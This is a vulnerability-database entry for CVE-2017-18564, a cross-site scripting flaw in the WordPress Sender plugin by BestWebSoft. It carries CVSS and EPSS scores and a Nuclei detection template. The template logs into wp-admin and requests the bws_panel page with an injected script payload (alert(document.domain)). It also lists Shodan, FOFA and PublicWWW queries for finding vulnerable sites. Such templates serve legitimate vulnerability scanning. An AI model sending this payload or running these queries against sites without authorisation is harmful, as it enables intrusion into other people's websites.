Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2017-18564
HistoryOct 05, 2023 - 6:36 p.m.

Sender by BestWebSoft < 1.2.1 - Cross-Site Scripting

2023-10-0518:36:49
ProjectDiscovery
github.com
1
cve
wordpress
plugin
cross-site scripting
bestwebsoft
wpscan
authenticated

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

37.9%

The sender plugin before 1.2.1 for WordPress has multiple XSS issues.
id: CVE-2017-18564

info:
  name: Sender by BestWebSoft < 1.2.1 - Cross-Site Scripting
  author: luisfelipe146
  severity: medium
  description: |
    The sender plugin before 1.2.1 for WordPress has multiple XSS issues.
  reference:
    - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694
    - https://nvd.nist.gov/vuln/detail/CVE-2017-18564
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18564
    - https://wordpress.org/plugins/sender/#developers
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2017-18564
    cwe-id: CWE-79
    epss-score: 0.00088
    epss-percentile: 0.3753
    cpe: cpe:2.3:a:bestwebsoft:sender:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: bestwebsoft
    product: sender
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/sender/
    fofa-query: body=/wp-content/plugins/sender/
    publicwww-query: "/wp-content/plugins/sender/"
  tags: cve,cve2017,wordpress,wp-plugin,xss,bws-sender,wpscan,authenticated,bestwebsoft

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /wp-content/plugins/sender/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(header_2, "text/html")'
          - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")'
          - 'contains(body_3, "Sender by BestWebSoft")'
        condition: and
# digest: 490a0046304402203d7b910fbb597d244b1ea4ccd7d651abea88be36087caab1e0acfda7ce34b94c02203a1f52d4311fe05cbe69ec2e8ad15bdd999b037254222c69de4bc8144edfe40a:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

37.9%

Related for NUCLEI:CVE-2017-18564